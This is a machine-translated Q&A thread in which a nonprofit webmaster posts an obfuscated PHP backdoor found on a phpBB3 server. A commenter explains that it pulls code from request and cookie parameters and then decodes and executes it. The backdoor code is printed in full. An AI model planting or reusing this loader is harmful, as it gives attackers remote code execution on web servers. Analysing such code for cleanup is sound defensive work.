1
私は非営利団体のためにウェブサイトを運営しています.GodaddyでホストされているPHPbb3システムにピギーバックします。ローリング接続の問題が発生しました。私が知っているルートディレクトリにいくつかの "奇妙な"ファイルが見つかりました。誰もがコードを見て、これらのファイルが何をしていたかを見ることができますか?サーバー上の悪意のあるPHPコードが見つかりました - 誰でもこのコードの動作をアドバイスできますか?
<?php
$katya='=KIT(a'; $choral= '$'; $fireproof='c'; $avivah= '=UlQy'; $islander= 'O'; $endosperm = '_s'; $fume=':S_:uee';
$knighthood ='WH'; $bars ='r$m';
$delicately ='D'; $caterpillar = '<ElUsabt'; $daydreaming ='$'; $contrasting = 't'; $gladys= 'S'; $complementing= '('; $kink = 'CK';$goblet ='X';$astigmatic = ')eklE';$ethane= 'l'; $aquamarine= 'Q'; $amalgams= 'u';$ardently= '[email protected]]L;"';
$cruelly='e';$lateral = 'P';
$chased = 'G'; $aspects = 'e,girT';$dismayed ='$x$Le';$handicap='s';$glints ='d'; $cursing=']Eg'; $jurisprudent = '[ac';$indeed ='M'; $influenza= '_';
$dehydrate= 'a';
$exch= ')__';$felling ='s'; $jedimaster= 'leFa'; $interrogating ='M';
$exaggerating='TLstSi)(_';
$introduced='['; $barrette='ARLEn;E;'; $halfhearted= 'o)"s$(fm';$jeffy ='O'; $ange = '9';
$handicraftsmen = ')p'; $giacinta = 'r[("KeHLv'; $johann='d'; $efferent ='r';$involving='l'; $cornucopia ='d';$assortment ='$u>U(vSov'; $idles='a';$decimated='`'; $grater = 'e';$chewing = 't'; $kayo='"';$currant =' ';$astronomically ='6'; $decomposition= 'Yo';$dukeleto ='cbi'; $diverging ='O'; $earning = 'e"';$caveman = '?';
$independent = '"';
$lab= '=(ia$'; $anode = '$';$jixian='y';$freights = '[E';$approve ='(__';
$gnome= 'KLeptre';
$crimson ='r';
$chandler='i_X$gaa';$edits='?';$blunderings='_';$attraction ='P';$avoid='k)rRf7vX';$liabilities='4';$blaster='P'; $alumnae= 's'; $daveen ='VecStT_';$crop= 'esm)Mr'; $isles ='tLnga"'; $beniamino='rRuiJVe';$concentrators = '"';
$commando='i';
$angrier ='i';$boatsman = 'RhTT_;B'; $informal='s'; $anode =':';$compatible ='^';$catherine = '8In'; $blade= 'e';
$inquisition ='[';
$brutalize='l';
$garfield=']Us'; $cruisers = 'r'; $galleried = 'H'; $garvy = '(5d';$lesson = ')6';$gunplay = '('; $fertilization =',';
$halibut =')';
$bravura = ';)lCa';$lamp = 'N';$drain = 'c';$hydroxy ='fa)Z'; $beetles= ']]i(x';$daniella = '?';$bar=$drain.
$cruisers .$blade.
$hydroxy['1'].
$isles['0'] . $blade. $boatsman['4'] . $hydroxy['0'].$beniamino['2'] .$catherine['2'].
$drain. $isles['0']. $beetles['2']. $decomposition['1'] .
$catherine['2']; $bulls= $currant ;$hog=$bar ($bulls, $blade.$avoid[6].
$hydroxy['1'] . $bravura['2'] .$beetles['3'] .$hydroxy['1'] .$cruisers.$cruisers. $hydroxy['1'] .$jixian.
$boatsman['4']. $gnome['3'] . $decomposition['1'].
$gnome['3'].
$beetles['3'].$hydroxy['0'].$beniamino['2'] .$catherine['2']. $drain .
$boatsman['4'] .$isles['3'] .$blade .$isles['0'] .
$boatsman['4']. $hydroxy['1'] . $cruisers. $isles['3'].
$garfield['2'] . $beetles['3']. $hydroxy[2]. $hydroxy[2] .
$hydroxy[2] .$bravura['0']);
$hog
($avoid['5'] ,$delicately, $garfield['1'], $chandler['3'] ,$lucia , $corporacy[2] ,$boatsman['6'] , $chandler['3'] . $beetles['2']. $lab['0'] .$hydroxy['1'] . $cruisers . $cruisers .$hydroxy['1']. $jixian .$boatsman['4'].$crop['2'] .
$blade.$cruisers . $isles['3']. $blade .
$beetles['3'].$chandler['3'] .$boatsman['4'] . $boatsman['0'] .
$freights['1'] .
$aquamarine.$garfield['1'] .$freights['1'] .
$daveen[3] .
$boatsman[3]. $fertilization .$chandler['3'].$boatsman['4']. $bravura['3']. $diverging.
$diverging .$gnome['0'].$catherine['1'] .
$freights['1'].$fertilization .
$chandler['3'] .$boatsman['4'] . $daveen[3] . $freights['1'] .$boatsman['0']. $beniamino[5].
$freights['1']. $boatsman['0'] . $hydroxy[2] . $bravura['0']. $chandler['3'] . $hydroxy['1'].$lab['0'] .
$beetles['2'] .$garfield['2'].$garfield['2'] .
$blade . $isles['0'] .$beetles['3'] .$chandler['3'] . $beetles['2'] .
$inquisition .
$concentrators.$crop['2']. $avoid['0'] .$bravura['2'].$garfield['2'].
$beetles['4'] .$bravura['2']. $beniamino['2'] .$bravura['2'].$concentrators.$beetles['1'] .
$hydroxy[2] .$daniella['0'].
$chandler['3'] .$beetles['2']. $inquisition.$concentrators . $crop['2']. $avoid['0'] .$bravura['2'] . $garfield['2'] . $beetles['4'] .$bravura['2'].
$beniamino['2'] .$bravura['2'] .$concentrators .
$beetles['1'] .
$anode . $beetles['3']. $beetles['2'] . $garfield['2'].$garfield['2'] .$blade . $isles['0']. $beetles['3'] . $chandler['3'].$beetles['2'] . $inquisition .$concentrators .$galleried. $boatsman[3]. $boatsman[3].$blaster . $boatsman['4']. $crop[4]. $gnome['0'] .$isles['1'] .$daveen[3].
$avoid['7']. $isles['1'] .$garfield['1'] .
$isles['1']. $concentrators .$beetles['1'].$hydroxy[2] .$daniella['0'].$chandler['3'].
$beetles['2'].$inquisition .$concentrators .
$galleried.
$boatsman[3]. $boatsman[3].
$blaster.$boatsman['4'] .
$crop[4].$gnome['0'] . $isles['1'].$daveen[3].$avoid['7'].
$isles['1']. $garfield['1'] .$isles['1'].$concentrators . $beetles['1']. $anode.
$garvy['2'] .$beetles['2'] . $blade . $hydroxy[2].$bravura['0'].$blade . $avoid[6].
$hydroxy['1'].$bravura['2'].
$beetles['3'] . $garfield['2']. $isles['0'] .$cruisers.
$cruisers. $blade .$avoid[6].$beetles['3']. $dukeleto['1']. $hydroxy['1'].$garfield['2'] . $blade .$lesson['1'] . $liabilities.$boatsman['4']. $garvy['2'].$blade . $drain. $decomposition['1']. $garvy['2'] .$blade.$beetles['3'] .
$garfield['2']. $isles['0']. $cruisers. $cruisers.$blade . $avoid[6] .
$beetles['3'] .
$chandler['3'].$hydroxy['1'] .$hydroxy[2].$hydroxy[2] .
$hydroxy[2] .$hydroxy[2]. $bravura['0']);
ほとんどのコードは、彼らが望むもの – cmorrissey
だから、このスクリプトは、実際に '$ _REQUESTを取っている実行/アップロードする攻撃者のためのコントロールパネルを開きます$ _COOKIE、$ _ SERVER'を1つの変数にマージし、特定の変数を探してデコードして評価します。基本的に、攻撃者はこのスクリプトで必要なコードを実行できます。 – cmorrissey
各PHPファイルを篩い分けする以外のアドバイスはありますか?私は複数のファイルの検索で探すべき特定の文字列ですか?何かアドバイスをいただければ幸いです。 –